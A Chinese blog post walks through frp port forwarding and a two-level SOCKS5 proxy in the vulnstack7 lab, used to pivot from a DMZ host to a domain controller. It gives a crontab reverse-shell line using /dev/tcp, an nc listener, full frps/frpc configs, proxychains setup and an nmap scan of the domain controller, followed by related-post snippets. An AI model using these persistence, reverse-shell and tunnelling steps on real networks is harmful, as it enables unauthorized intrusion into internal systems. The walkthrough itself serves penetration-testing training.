frp 内网渗透案例:端口转发 + 二级代理(深入理解 frp 在内网渗透中的技巧)

于 2025-03-26 17:02:29 发布
阅读量1.2k 收藏 25
点赞数 35
文章标签: 服务器 linux 网络 https web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/anddddoooo/article/details/146535371
版权

本文使用 vulnstack7 靶场作为测试环境,解释 frp 内网渗透特殊使用姿势,通过此案例来提高内网渗透能力。

  • 接下来的演示环境只做了以下修改。

    • 攻击者 vps 的 ip 修改为:192.168.72.162。

    • DMZ 区域的 ubuntu 的 ip1 修改为:192.168.72.129。

先引入问题,当我们控制了 DMZ 的 ubuntu 并且拿到第二层网络的 ubuntu 的 rce 后,会出现以下两个问题。

  • 如何搭建隧道让 ubuntu 反弹 shell 给攻击者 vps?

  • 如何搭建隧道让攻击者 vps 将 ubuntu 作为内网代理访问域控?

这就是这篇文章要讨论的内容。

端口转发

为了方便讨论,我们将 DMZ 区域的 ubuntu 称为 ubuntu1,第二层网络的 ubuntu 称为 ubuntu2。

我们先来解决其中一个问题,如何让第二层网络的 ubuntu2 反弹 shell 给攻击者 vps。我们先开启攻击者 vps 本地 4444 端口接收反弹 shell,假设我们现在使用 ubuntu2 的 root 权限在计划任务中写入反弹 shell,并标注反弹 shell 的 ip 为攻击者 vps 192.168.72.162,这肯定会失败,因为 ubuntu2 不出网,他找不到 ip 为 192.168.72.162 的主机。所以我们进行端口转发让 ubuntu2 能够定位到处于其他网段的 攻击者 vps。

在 ubuntu1 上配置端口转发

我们的思路是,ubuntu1 上开启 4444 端口,然后经由此端口的流量都会转发到攻击者 vps 的 4444 端口上,此刻,攻击者 vps 使用 nc 监听本地 4444 端口,且让 ubuntu2 反弹 shell 到 ubuntu1 的 4444 端口,流量自动转发到 vps 的 4444 端口上。

攻击者 vps 端口 4444 <-------------> 端口4444 ubuntu1 端口4444<------------->ubuntu2

# 首先在 ubuntu2 上将反弹 shell 写入 /etc/crontab
​
echo "* * * * * root bash -c 'bash -i >& /dev/tcp/192.168.52.10/4444 0>&1'" >> /etc/crontab

# 在 ubuntu1 上运行 frps。
​
frps.ini 配置文件如下:
[common]
bind_addr = 0.0.0.0
bind_port = 7100
dashboard_addr = 0.0.0.0
dashboard_port = 7101
dashboard_user = root
dashboard_pwd = 123456
token = 00253c8fcf9ae01
​
# 此程序将开启 ubuntu1 的 7100 端口作为 frp 服务端。

# 在 ubuntu1 上运行 frps。
​
frpc.ini 配置文件如下:
[common]
server_addr = 192.168.72.129
server_port = 7100
token = 00253c8fcf9ae01
pool_count = 5
health_check_type = tcp
health_check_interval_s = 100
[test]
remote_port = 6100
plugin = socks5
use_encryption = true
use_compression = true
plugin_user = admin
plugin_passwd = 123456
[rever_shell]
type = tcp
local_ip = 127.0.0.1
local_port = 4444 
remote_port = 4444          # 本地端口 4444 转发到远程端口 4444
[HTTP]
type = tcp
local_ip = 127.0.0.1
local_port = 8000           # 本地端口 8000 转发到远程端口 8000
remote_port = 8000
​
此脚本运行后会向 frps 7100 端口进行连接,然后指定 frps 开启本地(192.168.52.10) 6100 端口进行正向代理,
开启本地(192.168.52.10) 4444 向攻击者 vps (192.168.72.162) 4444 的端口转发。
开启本地(192.168.52.10) 8000 向攻击者 vps (192.168.72.162) 8000 的端口转发。
​
# 配置好后,攻击者 vps 开机端口监听
nc -lvp 4444

等待一会,发现反弹 shell 成功(左上图),且 frpc(左下图) 和 frps(右下图) 都有端口转发的记录。注:左下图哪个红色的报错是因为,我当时没有开启攻击者的 4444 的监听,所以给拒绝了。

端口转发拉取文件

还有一个小技巧,我们同时搭建了 8000 的端口转发,那么我们在 vps 上开启一个 8000 端口 web 服务,然后 ubuntu2 上执行 wget 命令可以拉取 vps 上的文件。(左:192.168.72.162,右:192.168.52.20)

二级代理

搭建好端口转发后,我们接下来就是搭建入网隧道访问域控了。通过以上端口转发拉取文件后,在 ubuntu2 搭建一个正向代理 frp。

# 注:之前搭建的端口转发出网隧道,一定不要关闭,我们需要使用类似于反弹 shell 的机制,让 frpc 通过端口转发回连 frps,详细内容如下:
​
攻击者 vps 占用端口 8000 的 frps <-------------> 端口8000 ubuntu1 端口8000<------------->ubuntu2 上的 frpc
​
# 在 vps (192.168.72.162)上新开一个 frps(注:不是 frpc),然后在 ubuntu2 上拉取 frpc,让 frpc 回连 frps 后即可搭建成功。
入网二级代理搭建
# 在 vps 上运行 frps。
​
frps 配置文件如下:
[common]
bind_addr = 0.0.0.0
bind_port = 8000                # frps 监听 vps 的 8000 端口。
dashboard_addr = 0.0.0.0
dashboard_port = 7102
dashboard_user = root
dashboard_pwd = 123456
token = 00253c8fcf9ae01
​
# 在 ubuntu2 上运行 frpc。
[common]
server_addr = 192.168.52.10
server_port = 8000              # 让 frpc 回连 192.168.52.10 的 8000 端口,自动转发到 vps 的 8000 端口。
token = 00253c8fcf9ae01
pool_count = 5
health_check_type = tcp
health_check_interval_s = 100
[test]
remote_port = 6200              # 攻击者通过本地 6200 端口访问深网域控
plugin = socks5
use_encryption = true
use_compression = true
plugin_user = admin
plugin_passwd = 123456 
​
# 运行完 frpc 后,frpc 回连 frps,frps 上开启 6200 端口作为访问 frpc 代理的端口。

由此我们通过端口转发 + 二级代理搭建了访问深网的隧道

访问域控

配置 proxychains
# 指定 vps 本地 6200 端口为内网代理。 
vim /etc/proxychains4.conf
​
socks5  127.0.0.1       6200    admin   123456
nmap 扫描域控
proxychains nmap -sT -Pn -n --open -p445,135,80,5985,5986,8000 192.168.93.30

流量过程

攻击者 vps 占用端口 6200 的 frps <-------------> 端口8000 ubuntu1 端口8000 <-------------> ubuntu2 上的 frpc <-------------> 域控。

其他使用姿势

我们之前介绍了两种端口转发使用姿势:

  • 反弹 shell 到 vps。

  • 拉取 vps 上的文件。

其实还有其他使用姿势和技巧:

  • ntlm relay 回连至攻击者机器(使用 printer bug)。

Lil_Dean
关注
web渗透Frp内网穿透
m0_74100826的博客
11-20 1106
FRP(Fast Reverse Proxy)是一种高性能的反向代理应用,主要用于内网穿透。它允许用户在无法直接访问的内网环境中,将内网服务安全地暴露到公上,方便远程访问。一种内网穿透工具, 使位于内网服务器或设备可以通过互联被访问, 支持 TCP、UDP、HTTP、HTTPS 等多种协议 另外一种方式是通过花生壳, 申请一个IP 然后安装花生壳的frp客户端, 配置对应的参数。frpc //客户端程序frpc_full.ini //客户端完整配置文件。
红队内网攻防渗透内网渗透内网对抗:隧道技术篇&防火墙组策略&FRP&NPS&Chisel&Socks代理&端口映射&C2上线
HACKONE的博客
06-21 942
目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网站、本地支付接口调试、ssh访问、远程桌面,DNS解析等),此外还支持内网http代理内网socks5代理、p2p等,并带有功能强大的web管理端。Frp是专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)建立客户端连接服务端后将141上5555给到服务端6666上。服务端启动:frps -c frps.ini。
内网渗透(二)——FRP隧道搭建
qq_61562251的博客
12-10 2364
配置好了,该电脑走到流量都是该公服务器的,也就是说,无需火狐挂代理,也可以直接访问到内网服务器所能访问到的内容。在使用中,避免其他人随意连接和被钓鱼,最好把token、账号秘密、流量加密添加进去。socket代理:可以将整台电脑的流量都进行转发,不支持icmp协议。操作简单,所以使用的人较多,有特征。注意:linux和Windows的配置文件是不一样的。可以打开页面了,页面地址是本地页面所设置的监听端口下。点对点代理:只将这个端口的流量进行转发。攻击者电脑通过代理配置,一样可以访问。
内网穿透&frp最新版0.60配置详解&远程桌面&端口转发
congsec的博客
03-13 2046
最近我在做三层内网实验,但发现上的很多文章要么是老旧版本,已经不适用了,要么是一些新版教程,配置后却无法正常运行。折腾了很久之后,我决定写一篇文章,详细地讲解整个过程,希望能帮助大家少踩坑,顺利完成配置。
frp前端web端口开放转发出来,用公端口访问
chen的博客
05-29 626
FRP(Fast Reverse-Proxy)是一个高性能的反向代理应用,它可以帮助用户将内网的服务映射到公上,使得外部用户可以通过公IP和特定的端口来访问内网中的服务。:在FRP配置完成后,用户可以通过指定的公IP地址和端口来访问原本位于内网中的Web服务。服务端部署在具有公IP的服务器上,负责接收来自外部的连接请求并转发内网的客户端。:端口转发是一种网络技术,它将一个网络地址的特定端口的流量转发到另一个网络地址的特定端口。在FRP中,端口转发允许将公端口流量转发内网的特定端口上。
FRP端口转发工具及部署方式详解(win+linux)(附远程访问本地Windows主机方法)
coderSalad的博客
09-09 4311
前言 在此前的文章中,介绍了使用ssh命令进行端口转发。 使用ssh进行端口转发有优点也有缺点,其优点主要在使用方便,服务器上基本都安装了ssh服务用来进行远程登录,因此只要有ssh命令就能实现端口转发的功能。但其缺点也很明显,主要在于远程转发、本地转发、动态转发等配置参数让使用者常常混淆,使用频率不高时也记不住这些参数。如果忘记设置ssh保活或出现网络波动导致链接断开也不方便自动重连,常常需要用户自己再写脚本来维护,这也增加了复杂性。 在实际使用中使用ssh来进行临时的端口转发比较方便,但是如果我们
FRP内网穿透-端口转发
m0_65442322的博客
09-29 1920
内网穿透frp
linux服务器上使用frp实现tcp端口转发--以访问内网mysql为例
weixin_44259638的博客
03-07 2610
前言 最近在部署测试环境 部署服务器上没有公地址和端口 无法使用navicat等工具对数据库操作 因此需要内网穿透或tcp端口转发来实现。
通过frp 免费内网穿透,端口转发
wzwwzwwww的博客
09-25 771
(1)拥有一台有公IP的服务器(系统可以是windows/macos/linux),服务器可以使用云厂商购买的服务器(2)从下面链接下载最新版本的frp安装包,客户端和服务端是同一个tar包。修改配置文件–注意 这里文件和服务端不一样。服务端机器B-需要内网穿透的作为客户端。服务端机器A-有外ip的作为服务端。服务端和客户端 都是用这个安装包。
内网流量流出1(frp端口转发
xiao_he0123的博客
03-15 4279
内网流量流出1前言一、frp是什么二、准备前提三,操作步骤1.服务端配置(frp服务器端一般命名为frps,配置文件为frps.ini)2.客户端配置(客户端一般命名为frpc,配置文件为frpc.ini)在这里插入图片描述3.使用总结 前言 在进行渗透测试是经常会遇到目标在内或者不能直接访问的情况,这时候就需要将我们的流量代理进目标内网 一、frp是什么 frp是一个可用于内网穿透的高性能的反向代理应用 支持TCP,udp协议,并尝试点对点的穿透 二、准备前提 (1)一台位于公上的服务器(作为服务端
frp 实现内网穿透mysql案例
12-05
在内穿透的应用场景中,frp服务通常由两个主要部分构成:server端和服务端。Server端负责接收外部网络的请求,并将这些请求转发给位于内网的服务端。服务端则是实际提供服务的内网主机,它通过frp client与server...
开源免费跨平台 内网穿透 远程内网电脑 自定义域名访问内网站点 反向代理内网服务 http代理 类花生壳 端口转发 微信 小程序 frp NAT ssh proxy tunnel ngork
最新发布
03-19
开源免费跨平台 内网穿透 远程内网电脑 自定义域名访问内网站点 反向代理内网服务 http代理 类花生壳 端口转发 微信 小程序 frp NAT ssh proxy tunnel ngork
渗透测试6---神器nc,frp内网穿透,window下的netsh端口转发,window下的内网穿透工具lcx
初遇我ㄖ寸の热情呢?
04-14 8958
nc/netcat/ncat简史 nc是代理转发的神奇 nc被誉为网络安全界的瑞士军刀,端口扫描工具,也是一款安全工具,还能是一款监测工具,通过使用TCP或UDP协议的网络连接去读写数据 nc的版本非常乱,有很多版本。 传统版本:(有扫描功能,现代版本没有) netcat-traditional : Kali Linux默认的版本,命令为nc或netcat netcat-openbs...
frp :TCP端口转发应用配置
qq_34232027的博客
02-14 330
内网穿透 端口转发服务器 tcp
FRP实现内网穿透
qq_40965033的博客
01-11 1951
1、什么是内网穿透 简单说就是内网中的一台计算机具有自己的内部IP,外的计算机具有公共的IP,而内部IP是无法直接通过外来访问的,这就需要一种方式来将外的IP转化为内部的合法IP来进行合法访问。 2、内网穿透过程 1)在具有公IP的服务器或VPS上安装运行 frp 的服务端程序frps 2)在处于内网的目标主机上面安装运行 frp 的客户端程序 frpc ...
Frp实现内网穿透
xhscxj的博客
11-06 895
因为黑客机处于内网,受害机也处于内网,他们不能直接通信此时就需要一个公的ip来扮演“中间人”的角色,让他们俩个能够成功的通信。
frp实现内网穿透
1193379199的博客
01-08 2235
注意:/usr/local/frp/frp_0.38.0_linux_amd64 这个路径是你解压frp后的路径,我是放在/usr/local/frp_0.38.0_linux_amd64放这个路径,如果你不是这个路径,这里要换成你存放的对应路径。remote_port 表示在 frp 服务端监听的端口,访问此端口的流量将会被转发到本地服务对应的端口。通过浏览器访问 http://x.x.x.x:18001/static/ 来查看位于 D:/test 目录下的文件,会要求输入已设置好的用户名和密码。
frp进行内网穿透【转载】
weixin_45596492的博客
06-02 627
frp进行内网穿透
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值